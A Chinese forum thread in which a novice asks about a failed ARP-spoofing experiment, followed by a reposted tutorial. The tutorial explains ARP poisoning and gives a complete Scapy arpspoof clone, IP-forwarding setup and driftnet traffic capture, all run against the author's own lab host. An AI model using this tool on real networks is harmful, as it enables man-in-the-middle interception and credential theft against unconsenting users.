關於arp欺騙攻擊進行的一些實驗出現的疑惑?

rt 題主做了一些關於arp攻擊的實驗,用虛擬機上的kali攻擊自己宿主機,發現斷網攻擊並不能使主機斷網,也就是說能ping通(而且還是流暢的要死……就像是沒有受到攻擊一樣)

能夠肯定的是主機的ip與網關地址還有網卡的判斷是沒有問題的,主機也沒有開啟360,win防火牆已關

哦對了用的是arpspoof命令……

題主屬於萌新一名,還請有經驗的各位不吝賜教,謝謝!


Python黑帽編程 3.1 ARP欺騙

https://www.zhihu.com/people/xuan-hun

玄魂工作室-玄魂 · 12 小時前

ARP欺騙是一種在區域網中常用的攻擊手段,目的是讓區域網中指定的(或全部)的目標機器的數據包都通過攻擊者主機進行轉發,是實現中間人攻擊的常用手段,從而實現數據監聽、篡改、重放、釣魚等攻擊方式。

在進行ARP欺騙的編碼實驗之前,我們有必要了解下ARP和ARP欺騙的原理。

3.1.1 ARP和ARP欺騙原理

ARP是地址轉換協議(Address Resolution Protocol)的英文縮寫,它是一個鏈路層協議,工作在OSI 模型的第二層,在本層和硬體介面間進行聯繫,同時對上層(網路層)提供服務。我們知道二層的乙太網交換設備並不能識別32位的IP地址,它們是以48位乙太網地址(就是我們常說的MAC地址)傳輸乙太網數據包的。也就是說IP數據包在區域網內部傳輸時並不是靠IP地址而是靠MAC地址來識別目標的,因此IP地址與MAC地址之間就必須存在一種對應關係,而ARP協議就是用來確定這種對應關係的協議。

ARP工作時,首先請求主機會發送出一個含有所希望到達的IP地址的乙太網廣播數據包,然後目標IP的所有者會以一個含有IP和MAC地址對的數據包應答請求主機。這樣請求主機就能獲得要到達的IP地址對應的MAC地址,同時請求主機會將這個地址對放入自己的ARP表緩存起來,以節約不必要的ARP通信。ARP緩存表採用了老化機制,在一段時間內如果表中的某一行沒有使用,就會被刪除。

區域網上的一台主機,如果接收到一個ARP報文,即使該報文不是該主機所發送的ARP請求的應答報文,該主機也會將ARP報文中的發送者的MAC地址和IP地址更新或加入到ARP表中。

ARP欺騙攻擊就利用了這點,攻擊者主動發送ARP報文,發送者的MAC地址為攻擊者主機的MAC地址,發送者的IP地址為被攻擊主機的IP地址。通過不斷發送這些偽造的ARP報文,讓區域網上所有的主機和網關ARP表,其對應的MAC地址均為攻擊者的MAC地址,這樣所有的網路流量都會發送給攻擊者主機。由於ARP欺騙攻擊導致了主機和網關的ARP表的不正確,這種情況我們也稱為ARP中毒。

根據ARP欺騙者與被欺騙者之間的角色關係的不同,通常可以把ARP欺騙攻擊分為如下兩種:

1. 主機型ARP欺騙:欺騙者主機冒充網關設備對其他主機進行欺騙

2. 網關型ARP欺騙:欺騙者主機冒充其他主機對網關設備進行欺騙

圖2

其實很多時候,我們都是進行雙向欺騙,既欺騙主機又欺騙網關。

了解了基本原理之後,我們下面動手實現ARP欺騙程序。

3.1.2 基本網路信息

首先,我們來查看下當前虛擬機Kali Linux的網路配置和ARP緩存。

圖3

如圖5所示,Kali Linux 乙太網卡為eth0,ip地址為192.168.1.102,MAC地址為00:0c:29:6e:98:a6。下面我們再查看Kali Linux的ARP緩存。

圖4

下面再用同樣的方法查看Windows 系統的信息。

圖5

windows本身地址為192.168.1.18,同樣緩存了路由器的地址。

下面我們將windows所在主機作為靶機,將Kali Linux所在虛擬機作為攻擊機,進行編程測試。

3.1.3 構造ARP欺騙數據包

我們先完成第一個目標,告訴目標主機192.168.1.18網關的地址為Kali Linux所在主機的地址:192.168.1.102。

在程序的頂部,我們先導入scapy。

import sys
import time
from scapy.all import (
get_if_hwaddr,
getmacbyip,
ARP,
Ether,
sendp
)

注意這裡面的幾個方法,get_if_hwaddr為獲取本機網路介面的函數,getmacbyip是通過ip地址獲取其Mac地址的方法,ARP是構建ARP數據包的類,Ether用來構建乙太網數據包,sendp方法在第二層發送數據包。

我們先解下Ether的參數:

圖6

dst : DestMACField = (None)
src : SourceMACField = (None)
type : XShortEnumField = (36864)

構造一個乙太網數據包通常需要指定目標和源MAC地址,如果不指定,默認發出的就是廣播包,例如:

圖7

再來了解下ARP類構造函數的參數列表:

圖8

hwtype : XShortField = (1)
ptype : XShortEnumField = (2048)
hwlen : ByteField = (6)
plen : ByteField = (4)
op : ShortEnumField = (1)
hwsrc : ARPSourceMACField = (None)
psrc : SourceIPField = (None)
hwdst : MACField = ("00:00:00:00:00:00")
pdst : IPField = ("0.0.0.0")

構造ARP需要我們注意的有5個參數:

l op。取值為1或者2,代表ARP請求或者響應包。
l hwsrc。發送方Mac地址。
l psrc。發送方IP地址。
l hwdst。目標Mac地址。
l pdst。目標IP地址。

定向欺騙

現在來構造數據包就很容易了,回到我們最初的目標,我們想告訴192.168.1.23這台主機網關地址為192.168.1.102所在的主機,構造的數據包應該是這樣的:

pkt = Ether(src=[1.102的MAC], dst=[1.18的Mac]) / ARP(1.102的MAC, 網關IP地址,hwdst=1.18MAC, pdst=1.18IP地址, op=2)

上面的代碼我們不論是乙太網數據包還是ARP數據包,我們都明確指定了來源和目標,在ARP數據包中,我們將Kali Linux的Mac地址和網關的IP地址進行了綁定,op取值為2,作為一個響應包被1. 18接到,這樣1. 18會更新自己的ARP緩存表,造成中毒,從而1. 18發往網關的數據包都會被發往1.102。

那麼我們如果要欺騙網關,把網關發往1.18的數據包都發送到Kali Linux(1.102)上,根據上面的代碼稍作修改即可:

pkt = Ether(src=[1.102的MAC], dst=[網關的Mac]) / ARP(1.102的MAC, 1. 18地址, hwdst=網關MAC,pdst=網關IP地址, op=2)

上面構造的兩個數據包都是ARP響應包,其實發送請求包也可以進行毒化,請求包毒化的原理是,我們請求時候使用假的源IP和MAC地址,目標主機同樣會更新自己的路由表。

ARP請求的方式欺騙主機,構造的ARP包如下:

pkt = Ether(src=[1.102的MAC], dst=[1. 18的Mac]) / ARP(1.102的MAC, 網關IP地址, hwdst=1. 18MAC, pdst=1. 18IP地址, op=1)

ARP請求的方式欺騙網關,構造的ARP包如下:

pkt = Ether(src=[1.102的MAC], dst=[網關的Mac]) / ARP(1.102的MAC, 1. 18地址, hwdst=網關MAC,pdst=網關IP地址, op=1)

我們看到構造ARP請求和響應的主要區別在op的值。

目前我們欺騙的方式都是一對一欺騙的,事實上我們可以發送廣播包,對所有主機進行欺騙。

廣播欺騙

廣播欺騙,首先乙太網數據包直接構造一個廣播包,ARP包不用填寫目標主機的信息即可。

下面是ARP廣播響應包的構造方式:

pkt = Ether(src=mac, dst="ff:ff:ff:ff:ff:ff") / ARP(hwsrc=mac, psrc=args[0], op=2)

最後綜合定下和廣播欺騙的方式,我們總結一個公式出來:

pkt = Ether(src=攻擊機MAC, dst=被欺騙主機(或網關)MAC) / ARP((hwsrc=毒化記錄中的MAC, 毒化記錄中的IP, hwdst=被欺騙主機MAC, pdst=被欺騙主機IP地址, op=1(或2))

概念有點繞,實踐出真知。

3.1.4 發送數據包

數據包構造完成之後,我們要做的就是發送了,發送數據包這裡我們使用sendp方法,該方法描述如下:

Send packets at layer 2
sendp(packets, [inter=0], [loop=0], [verbose=conf.verb]) -&> None

和sendp方法類似的還有一個send方法,兩個方法不同的是,sendp方法工作在第二層,send方法工作在第三層。發送構造好的數據包就很簡單了:

sendp(pkt, inter=2, iface=網卡)

3.1.5 打造你的ARPSPOOF

ARP欺騙的核心內容我們已經講完了,在Kali Linux上有一款常用的ARP欺騙工具叫arpspoof。

圖9

(關於arpspoof的使用可以參考我的視頻教程《kali linux 滲透測試初級教程》,文末有獲取方法。)

雖然我們不知道arpspoof的內部實現代碼,但是我們完全可以根據目前掌握的知識,用Python來實現它。廢話少說,先上代碼:

#!/usr/bin/python

import os
import sys
import signal

from scapy.all import (
get_if_hwaddr,
getmacbyip,
ARP,
Ether,
sendp
)
from optparse import OptionParser

def main():
try:
if os.geteuid() != 0:
print "[-] Run me as root"
sys.exit(1)
except Exception,msg:
print msg

usage = "Usage: %prog [-i interface] [-t target] host"
parser = OptionParser(usage)
parser.add_option("-i", dest="interface", help="Specify the interface to use")
parser.add_option("-t", dest="target", help="Specify a particular host to ARP poison")
parser.add_option("-m", dest="mode", default="req", help="Poisoning mode: requests (req) or replies (rep) [default: %default]")
parser.add_option("-s", action="store_true", dest="summary", default=False, help="Show packet summary and ask for confirmation before poisoning")
(options, args) = parser.parse_args()

if len(args) != 1 or options.interface is None:
parser.print_help()
sys.exit(0)

mac = get_if_hwaddr(options.interface)

def build_req():
if options.target is None:
pkt = Ether(src=mac, dst="ff:ff:ff:ff:ff:ff") / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)

return pkt

def build_rep():
if options.target is None:
pkt = Ether(src=mac, dst="ff:ff:ff:ff:ff:ff") / ARP(hwsrc=mac, psrc=args[0], op=2)
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target, op=2)

return pkt

if options.mode == "req":
pkt = build_req()
elif options.mode == "rep":
pkt = build_rep()

if options.summary is True:
pkt.show()
ans = raw_input("
[*] Continue? [Y|n]: ").lower()
if ans == "y" or len(ans) == 0:
pass
else:
sys.exit(0)

while True:
sendp(pkt, inter=2, iface=options.interface)
if __name__ == "__main__":
main()

代碼略微有一點多,不過核心內容沒有離開我們上面講到的內容,現在做個分解。

usage = "Usage: %prog [-i interface] [-t target] host"
parser = OptionParser(usage)
parser.add_option("-i", dest="interface", help="Specify the interface to use")
parser.add_option("-t", dest="target", help="Specify a particular host to ARP poison")
parser.add_option("-m", dest="mode", default="req", help="Poisoning mode: requests (req) or replies (rep) [default: %default]")
parser.add_option("-s", action="store_true", dest="summary", default=False, help="Show packet summary and ask for confirmation before poisoning")
(options, args) = parser.parse_args()

if len(args) != 1 or options.interface is None:
parser.print_help()
sys.exit(0)

首先,我們引入了optparse模塊,用來格式化用戶輸入的參數,如果用戶輸入參數不正確,會列印使用說明。

圖10

下面調用了get_if_hwaddr方法,根據參數中傳入的網卡,獲取本機MAC地址,該MAC地址在構建乙太網和ARP數據包的時候做為攻擊機的MAC地址被使用。

接下來是build_req方法,和build_rep方法,分別用來構建ARP請求和響應包。兩個方法會檢查是否指定了目標地址,如果沒有就是廣播欺騙,如果有就是定下欺騙。兩個方法裡面使用了getmacbyip方法來根據ip地址獲取目標主機的MAC地址。構建數據包的原理我們上面講的很清楚了,這裡就不重複了。

再往下是根據輸入的參數,判斷應該構建的數據包類型,調用對應的方法。

if options.mode == "req":
pkt = build_req()
elif options.mode == "rep":
pkt = build_rep()

if options.summary is True:
pkt.show()
ans = raw_input("
[*] Continue? [Y|n]: ").lower()
if ans == "y" or len(ans) == 0:
pass
else:
sys.exit(0)

最後是發送數據包和程序的入口。

while True:
sendp(pkt, inter=2, iface=options.interface)
if __name__ == "__main__":
main()

程序準備妥當,我們保存源碼,下面開始測試。

3.1.6 測試

在做ARP欺騙測試的時候,一定要先開啟本機的IP轉發功能,否則會失敗的。執行如下命令:

sysctl net.ipv4.ip_forward=1

圖11

下面我們打開終端,對192.168.1.18進行欺騙,告訴它網關為192.168.1.102所在的主機。

圖12

在打開一個終端,對網關進行欺騙,告訴網關,192.168.1.18對應的主機為192.168.1.102.

python arp1.py -i eth0 -t 192.168.1.1 192.168.1.18

一段時間之後,我們發現,192.168.1.18的arp緩存發生了變化:

圖13

對比圖13和圖5我們知道arp毒化成功。下面我們來看一下能發捕獲到1.18的外網請求信息,使用常用的測試工具driftnet。

圖14

下面在1.18上隨便打開幾個帶有圖片的網頁。

圖15

在drifnet上面我們可以看到捕獲的圖片信息,如圖16所示。

圖16

證明我們的arp欺騙程序編寫成功。

3.1.7 在此基礎上我們能做什麼

上面的測試,我們知道基於ARP欺騙我們可以做數據監聽,能拿到敏感信息,能拿到憑證進行重放攻擊,能進行數據篡改,結合調用和DNS欺騙做很多事情。

關於進一步的實戰利用,這裡我就不展開了,在我的視頻教程《Kali Linux web滲透測試基礎教程》的第十四課《第14課-arp欺騙、嗅探、dns欺騙、session劫持》講了很多實用的工具,可以在ARP欺騙的基礎上做很多測試。只要在玄魂工作室的微信訂閱號(在下方掃碼關注)下回復「kali」,會自動回復你免費獲取整套教程的方法。

3.1.8 小結

本節比較詳細的講解了基於Scapy進行ARP數據包構建和發送的基礎知識,綜合這些基礎進行ARP欺騙的工具編寫,最終完成了一個可用的ARP欺騙工具。

下一節,基於本節的知識,我們編寫一個ARP監控工具,來對網路上主機的ARP請求做動態的回應。

第3.2節《ARP監控》已經在微信訂閱號搶先發布,心急的同學進入訂閱號(二維碼在下方),從菜單「專欄」—&>」Python黑帽編程」進入即可。

查看完整系列教程,請關注我的微信訂閱號(xuanhun521,下方二維碼),回復「python」。問題討論請加qq群:Hacking (1群):303242737 Hacking (2群):147098303。

點擊打開二維碼

玄魂工作室-精彩不斷


沒圖你說個。。


推薦閱讀:

為什麼我的kali2.0裝了VMwareTools還是 不能複製文件進去,屏幕也不能自動大小?

TAG:網路安全 | arp攻擊 | KaliLinux | 中間人攻擊 |